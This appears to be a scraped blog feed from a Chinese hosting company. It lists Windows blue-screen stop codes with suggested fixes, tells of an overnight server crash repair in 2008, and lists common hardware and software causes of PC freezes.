◆错误分析:往往与电源有关系, 常常发生在与电源相关的操作, 比如:关机、待机或休睡.
◇解决方案:重装系统, 如果不能解决, 请更换电源.

26、0x000000A5:ACPI_BIOS_ERROR
◆错误分析:通常是因为主板BIOS不能全面支持ACPI规范.
◇解决方案:如果没有相应BIOS升级, 那么可在安装Windows 2K/XP时, 当出现"press F6 if you need to install a third-party SCSI or RAID driver"提示时, 按下F7键, 这样Windows便会自动禁止安装ACPI HAL, 而安装 Standard PC HAL.

27、0x000000B4:VIDEO_DRIVER_INIT_FAILURE
◆错误分析:这个停止信息表示Windows因为不能启动显卡驱动, 从而无法进入图形界面. 通常是显卡的问题, 或者是存在与显卡的硬件冲突(比如:与并行或串行端口冲突).
◇解决方案:进入安全模式查看问题是否解决, 如果可以, 请升级最新的显卡驱动程序, 如果还不行, 则很可能是显卡与并行端口存在冲突, 需要在安全模式按下WIN+break组合键打开"系统属性", 在硬件-->设备管理器中找到并双击连接打印的LPT1端口的项, 在"资源"选项卡中取消"使用自动配置"的构选, 然后将"输入/输出范围"的"03BC"改为"0378".

28、0x000000BE:ATTEMPTED_WRITE_TO_READONLY_MEMORY
◆错误分析:某个驱动程序试图向只读内存写入数据造成的. 通常是在安装了新的驱动程序, 系统服务或升级了设备的固件程序后.
◇解决方案:如果在错误信息中包含有驱动程序或者服务文件名称, 请根据这个信息将新安装的驱动程序或软件卸载或禁用.

29、0x000000C2:BAD_POOL_CALLER
◆错误分析:一个内核层的进程或驱动程序错误地试图进入内存操作. 通常是驱动程序或存在BUG的软件造成的.
◇解决方案:请参考前面介绍的常规解决方案相关项目进行排除.

30、0x000000CERIVER_UNLOADED_WITHOUT_CANCELLING_PENDING_OPERATIONS
◆错误分析:通常是由有问题的驱动程序或系统服务造成的.
◇解决方案:请参考前面介绍的常规解决方案相关项目进行排除.

31、0x000000D1RIVER_IRQL_NOT_LESS_OR_EQUAL
◆错误分析:通常是由有问题的驱动程序引起的(比如罗技鼠标的Logitech MouseWare 9.10和9.24版驱动程序会引发这个故障). 同时,有缺陷的内存、 损坏的虚拟内存文件、 某些软件(比如多媒体软件、杀毒软件、备份软件、DVD播放软件)等也会导致这个错误.
◇解决方案:检查最新安装或升级的驱动程序(如果蓝屏中出现"acpi.sys"等类似文件名, 可以非常肯定时驱动程序问题)和软件; 测试内存是否存在问题; 进入"故障恢复控制台", 转到虚拟内存页面文件Pagefile.sys所在分区, 执行"del pagefile.sys"命令, 将页面文件删除; 然后在页面文件所在分区执行"chkdsk /r"命令;进入Windows后重新设置虚拟内存.如果在上网时遇到这个蓝屏, 而你恰恰又在进行大量的数据下载和上传(比如:网络游戏、BT下载), 那么应该是网卡驱动的问题, 需要升级其驱动程序.

32、0x000000EA:THREAD_STUCK_IN_DEVICE_DRIVER
◆错误分析:通常是由显卡或显卡驱动程序引发的.
◇解决方案:先升级最新的显卡驱动, 如果不行, 则需要更换显卡测试故障是否依然发生.

33、0x000000ED:UNMOUNTABLE_BOOT_VOLUME
◆错误分析:一般是由于磁盘存在错误导致的, 有时也建议检查硬盘连线是否接触不良, 或是没有使用合乎该硬盘传输规格的连接线, 例如ATA-100仍使用ATA-33的连接线, 对低速硬盘无所谓, 但告诉硬盘(支持ATA-66以上)的要求较严格, 规格不对的连线有时也会引起这类没办法开机的故障. 如果在修复后, 还是经常出现这个错误, 很可能是硬盘损坏的前兆.
◇解决方案:一般情况下, 重启会解决问题, 不管怎么样都建议执行"chkdsk /r"命令来检查修复硬盘

34、0x000000F2:HARDWARE)INTERRUPT_STORM
◆错误分析:内核层检查到系统出现中断风暴, 比如:某个设备在完成操作后没有释放所占用
的中断. 通常这是由缺陷的驱动程序造成的.
◇解决方案:升级或卸载最新安装的硬件驱动程序.

35、0x00000135:UNABLE_TO_LOCATE_DLL
◆错误分析:通常表示某个文件丢失或已经损坏, 或者是注册表出现错误.
◇解决方案:如果是文件丢失或损坏, 在蓝屏信息中通常会显示相应的文件名, 你可以通过网络或是其他电脑找到相应的文件, 并将其复制到系统文件夹下的SYSTEM32子文件夹中. 如果没有显示文件名, 那就很有可能是注册表损坏, 请利用系统还原或是以前的注册表备份进行恢复.

36、0x0000021A:STATUS_SYSTEM_PROCESS_TERMINATED
◆错误分析:用户模式子系统, 例如Winlogon或客服服务运行时子系统(CSRSS)已损坏, 所以无法再保证安全性, 导致系统无法启动. 有时, 当系统管理员错误地修改了用户帐号权限, 导致其无法访问系统文件和文件夹.
◇解决方案:使用"最后一次正确的配置", 如果无效, 可使用安装光盘进行修复安装.

37、STOP 0xC0000221 or STATUS_IMAGE_CHECKSUM_MISMATCH
◆错误分析:通常是由于驱动程序或系统DLL文件损坏造成的. 一般情况下, 在蓝屏中会出现
文件名称
◇解决方案:
(1)使用Windows安装光盘进行修复安装;
(2)如果还能进入安全模式, 可以"开始-->运行": sfc /scannow
(3)还可以采用提取文件的方法来解决, 进入"故障恢复控制台", 使用copy或expand命令从光盘中复制或解压受损的文件. 不过, 蓝屏一般都是驱动程?

Internet Explorer 维护策略可能会导致 Winlogon 中出现访问冲突
症状
在基于 Windows XP 的客户端计算机上，如果应用了 Microsoft Internet Explorer 维护策略，则在登录过程中，您可能会在蓝屏上看到一条“Stop C000021A”错误信息。或者，客户端计算机可能会重新启动。直到您登录并注销数次之后这种问题才不会发生。

您可能还会看到以下错误信息：
STOP:0xc000021a STATUS_SYSTEM_PROCESS_TERMINATED

{Fatal System Error}

The Windows Logon Process system process terminated unexpectedly with a status of 0xaaaaaa (0xbbbbbb 0xcccccc)

The system has been shutdown.
原因
Internet Explorer 策略模块中的缓冲区溢出可能会损坏进程堆。这会导致 Winlogon.exe 中的访问冲突。只有在为 Internet Explorer 维护设置定义了组策略时，才会发生此问题。

38、服务器蓝屏STOP:C000021a {Fatal system error}
The windows logon process system process terminated unexpectedly with a status of the system has been shut down蓝屏前的错误提示：insock.gethostname.failed 怎么解决？
** 关掉一些程序池或者合并程序池就搞定！

]]> http://www.shangren.net/article/35.htm ziboren@yahoo.cn(admin) Thu,02 Oct 2008 09:50:33 +0800 http://www.shangren.net/default.asp?id=35 关掉一些程序池或者合并程序池就搞定！
本想国庆节在家好好装修房子，没想到过了一个无奈、焦虑、疲惫的20个小时。大概，早上7点钟，好几个空间用户开始打电话说网站打不开，ip地址也ping不通，初步判定是机房问题，电话机房没问题，机房值班人员接上显示器一检查是服务器蓝屏，于是给重启；
15分钟后，有由用户打电话，网站又打不开了，于是焦虑的一天开始了>>>>>>>
一边进进出出配合施工队装饰房子，一边联系机房，一边遭受客户埋怨：我的网站在百度做了推广，你这样我们就赔大了，快快！！！！（强烈建议：百度公司能把推广竞价暂停的权限放给用户自己管理，否则是不公平的霸权行为），一边还要给客户解释，这样持续到中午，还是不断蓝屏+++++++++++++
奇怪的是：别人服务器蓝屏出现的提示代码非常多，整整一屏而我的服务器蓝屏只显示两行：
STOP:C000021a {Fatal system error}
The windows logon process system process terminated unexpectedly with a status of the system has been shut down
晕倒，在网上搜的原因，都陆续试用过了还是不行，由于是突然蓝屏，服务器上面的日志记录也是空空如也，折等到晚上11点还是没有搞定，在无奈、沮丧之时，耐心的机房人员，终于管砸到蓝屏前的错误提示insock.gethostname.failed  （请看截图），这一提示太重要了。瞪着布满血丝的双眼、透过沾满装修灰尘的眼镜片，利用google的在线查查是什么意思，奶奶的，没翻译出来；只好单个词语翻译，大致意思是：insock.gethostname.failed 翻译：主机:以/连线者必须准备的专用于/方式的通讯软件/获得主机/失败,唉！winsock.gethostname.failed百度里没有相关介绍也没有具体的原因*************  不写了，太累了，最终结果是成功了，最终解决办法：关掉一些程序池或者合并程序池！
2008年10月2号凌晨1点多，尽管很累，仍然要奖励一下自己：到步行街夜市买个一条铁板鱿鱼，奖励自己！好好干，每天会更美好！

]]> http://www.shangren.net/article/34.htm ziboren@yahoo.cn(admin) Wed,01 Oct 2008 21:11:32 +0800 http://www.shangren.net/default.asp?id=34 【散热不良】
显示器、电源和CPU在工作中发热量非常大，因此保持良好的通风状况非常重要，如果显
示器过热将会导致色彩、图象失真甚至缩短显示器寿命。工作时间太长也会导致电源或显示器散热不畅而造成电脑死机。CPU的散热是关系到电脑运行的稳定性的重要问题，也是散热故障发生的“重灾区”。
【移动不当】
在电脑移动过程中受到很大振动常常会使机器内部器件松动，从而导致接触不良，引起电脑死机，所以移动电脑时应当避免剧烈振动。
【灰尘杀手】
机器内灰尘过多也会引起死机故障。如软驱磁头或光驱激光头沾染过多灰尘后，会导致读写错误，严重的会引起电脑死机。
【设备不匹配】
如主板主频和CPU主频不匹配，老主板超频时将外频定得太高，可能就不能保证运行的稳定性，因而导致频繁死机。
【软硬件不兼容】
三维软件和一些特殊软件，可能在有的微机上就不能正常启动甚至安装，其中可能就有软硬件兼容方面的问题。
【内存条故障】
主要是内存条松动、虚焊或内存芯片本身质量所致。应根据具体情况排除内存条接触故障，如果是内存条质量存在问题，则需更换内存才能解决问题。
【硬盘故障】
主要是硬盘老化或由于使用不当造成坏道、坏扇区。这样机器在运行时就很容易发生死机。可以用专用工具软件来进行排障处理，如损坏严重则只能更换硬盘了。另外对于在不支持UDMA 66/100的主板，应注意CMOS中硬盘运行方式的设定。
【CPU超频】
超频提高了CPU的工作频率，同时，也可能使其性能变得不稳定。究其原因，CPU在内存中存取数据的速度本来就快于内存与硬盘交换数据的速度，超频使这种矛盾更加突出，加剧了在内存或虚拟内存中找不到所需数据的情况，这样就会出现“异常错误”。解决办法当然也比较简单，就是让CPU回到正常的频率上。
【硬件资源冲突】
是由于声卡或显示卡的设置冲突，引起异常错误。此外，其它设备的中断、DMA或端口出现冲突的话，可能导致少数驱动程序产生异常，以致死机。解决的办法是以“安全模式”启动，在“控制面板”→“系统”→“设备管理”中进行适当调整。对于在驱动程序中产生异常错误的情况，可以修改注册表。选择“运行”，键入“REGEDIT”，进入注册表编辑器，通过选单下的“查找”功能，找到并删除与驱动程序前缀字符串相关的所有“主键”和“键值”，重新启动。
【内存容量不够】
内存容量越大越好，应不小于硬盘容量的0.5～1%，如出现这方面的问题，就应该换上容量尽可能大的内存条。
【劣质零部件】
少数不法商人在给顾客组装兼容机时，使用质量低劣的板卡、内存，有的甚至出售冒牌主板和Remark过的CPU、内存，这样的机器在运行时很不稳定，发生死机在所难免。因此，用户购机时应该警惕，并可以用一些较新的工具软件测试电脑，长时间连续考机（如72小时），以及争取尽量长的保修时间等。
由软件原因引起的死机
【病毒感染】
病毒可以使计算机工作效率急剧下降，造成频繁死机。这时，我们需用杀毒软件如KV300、 金山毒霸、瑞星等来进行全面查毒、杀毒，并做到定时升级杀毒软件。
【CMOS设置不当】
该故障现象很普遍，如硬盘参数设置、模式设置、内存参数设置不当从而导致计算机无法启动。如将无ECC功能的内存设置为具有ECC功能，这样就会因内存错误而造成死机。
【系统文件的误删除】
由于Windows
9x启动需要有Command.com、Io.sys、Msdos.sys等文件，如果这些文件遭破坏或被误删除，即使在CMOS中各种硬件设置正确无误也无济于事。解决方法：使用同版本操作系统的启动盘启动计算机，然后键入“SYS
C：”，重新传送系统文件即可。
【初始化文件遭破坏】
由于Windows
9x启动需要读取System.ini、Win.ini和注册表文件，如果存在Config.sys、Autoexec.bat文件，这两个文件也会被读取。只要这些文件中存在错误信息都可能出现死机，特别是System.ini、Win.ini、User.dat、System.dat这四个文件尤为重要。
【动态链接库文件（DLL）丢失】
在Windows操作系统中还有一类文件也相当重要，这就是扩展名为DLL的动态链接库文件，这些文件从性质上来讲是属于共享类文件，也就是说，一个DLL文件可能会有多个软件在运行时需要调用它。如果我们在删除一个应用软件的时候，该软件的反安装程序会记录它曾经安装过的文件并准备将其逐一删去，这时候就容易出现被删掉的动态链接库文件同时还会被其它软件用到的情形，如果丢失的链接库文件是比较重要的核心链接文件的话，那么系统就会死机，甚至崩溃。我们可用工具软件如“超级兔仔”对无用的DLL文件进行删除，这样会避免误删除。
【硬盘剩余空间太少或碎片太多】
如果硬盘的剩余空间太少，由于一些应用程序运行需要大量的内存、这样就需要虚拟内存，而虚拟内存则是由硬盘提供的，因此硬盘要有足够的剩余空间以满足虚拟内存的需求。同时用户还要养成定期整理硬盘、清除硬盘中垃圾文件的良好习惯。
【BIOS升级失败】
应备份BIOS以防不测，但如果你的系统需要对BIOS进行升级的话，那么在升级之前最好确定你所使用BIOS版本是否与你的PC相符合。如果BIOS升级不正确或者在升级的过程中出现意外断电，那么你的系统可能无法启动。所以在升级BIOS前千万要搞清楚BIOS的型号。如果你所使用的BIOS升级工具可以对当前BIOS进行备份，那么请把以前的BIOS在磁盘中拷贝一份。同时看系统是否支持BIOS恢复并且还要懂得如何恢复。
【软件升级不当】
大多数人可能认为软件升级是不会有问题的，事实上，在升级过程中都会对其中共享的
一些组件也进行升级，但是其它程序可能不支持升级后的组件从而导致各种问题。
【滥用测试版软件】
最好少用软件的测试版，因为测试软件通常带有一些BUG或者在某方面不够稳定，使用后会出现数据丢失的程序错误、死机或者是系统无法启动。
【非法卸载软件】
不要把软件安装所在的目录直接删掉，如果直接删掉的话，注册表以及Windows目录中会有很多垃圾存在，久而久之，系统也会变不稳定而引起死机。
【使用盗版软件】
因为这些软件可能隐藏着病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。
【应用软件的缺陷】
这种情况是常见的，如在Win 98中运行那些在DOS或Windows 3．1中运行良好的16位应用
软件。Win
98是32位的，尽管它号称兼容，但是有许多地方是无法与16位应用程序协调的。还有一些情况，如在Win
95下正常使用的外设驱动程序，当操作系统升级后，可能会出现问题，使系统死机或不能正常启动。遇到这种情况应该找到外设的新版驱动。
【启动的程序太多】
这使系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现异常错误。
【非法操作】
用非法格式或参数非法打开或释放有关程序，也会导致电脑死机。请注意要牢记正确格式和相关参数，不随意打开和释放不熟悉的程序。
【非正常关闭计算机】
不要直接使用机箱中的电源按钮，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要，严重的话，会引起系统崩溃。
【内存中冲突】
有时候运行各种软件都正常，但是却忽然间莫名其妙地死机，重新启动后运行这些应用程序又十分正常，这是一种假死机现象。出现的原因多是Win98的内存资源冲突。大家知道，应用软件是在内存中运行的，而关闭应用软件后即可释放内存空间。但是有些应用软件由于设计的原因，即使在关闭后也无法彻底释放内存的，当下一软件需要使用这一块内存地址时，就会出现冲突。

1\检查电脑主板\显卡\CPU等芯片是否有过热现象
2\主板上的电容是否有爆开的现象
3\重新插一遍板卡
不行再重装系统

华夏商人网客服 整理
]]>